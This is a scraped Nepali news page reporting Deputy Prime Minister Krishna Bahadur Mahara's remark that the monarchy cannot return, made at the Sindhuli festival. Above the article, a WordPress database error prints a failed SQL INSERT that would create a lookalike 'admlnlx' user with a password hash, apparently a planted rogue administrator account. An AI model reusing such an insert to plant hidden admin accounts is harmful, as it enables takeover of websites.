WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeQNxRrkYqFHg7kTkf.Yd4EC2ZK.3U/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:46:27', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
नेपालमा अब राजतन्त्र कुनै हालतमा फर्कन सक्दैन : उपप्रधानमन्त्री महरा – Gaule Khabar

नेपालमा अब राजतन्त्र कुनै हालतमा फर्कन सक्दैन : उपप्रधानमन्त्री महरा

नेपालमा अब राजतन्त्र कुनै हालतमा फर्कन सक्दैन : उपप्रधानमन्त्री महरा

सिन्धुली, पुस ८-

उपप्रधान तथा अर्थमन्त्री कृष्णबहादुर महराले राजनीतिक दलहरुबीच केही असमझदारी देखिए पनि मुलुकमा राजतन्त्र कुनै पनि हालतमा फर्कन नसक्ने बताएका छन् ।

सिन्धुली महोत्सवको उद्घाटन गर्दै मन्त्री महराले पछिल्लो समयमा राजनीतिक दलहरुका कारण संविधान कार्यान्वयन, संशोधन र स्थानीय निकायको निर्वाचनमा व्यवधान उत्पन्न भए पनि त्यसलाई सरकारले मिलाउने प्रयास गरिरहेको बताए ।उनले पूर्वराजा ज्ञानेन्द्र शाहले जारी गरेको वक्तव्यप्रति लक्षित गर्दै त्यस्ता गतिविधिमा सरिक नहुन सर्वसाधारणलाई अपील गरे ।

सिन्धुली उद्योग वाणिज्य संघ, जिल्ला विकास समिति सिन्धुली र कमलामाई नगरपालिकाको संयुक्त आयोजनामा सञ्चालन भएको सिन्धुली महोत्सव पुस १८ गतेसम्म चल्नेछ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका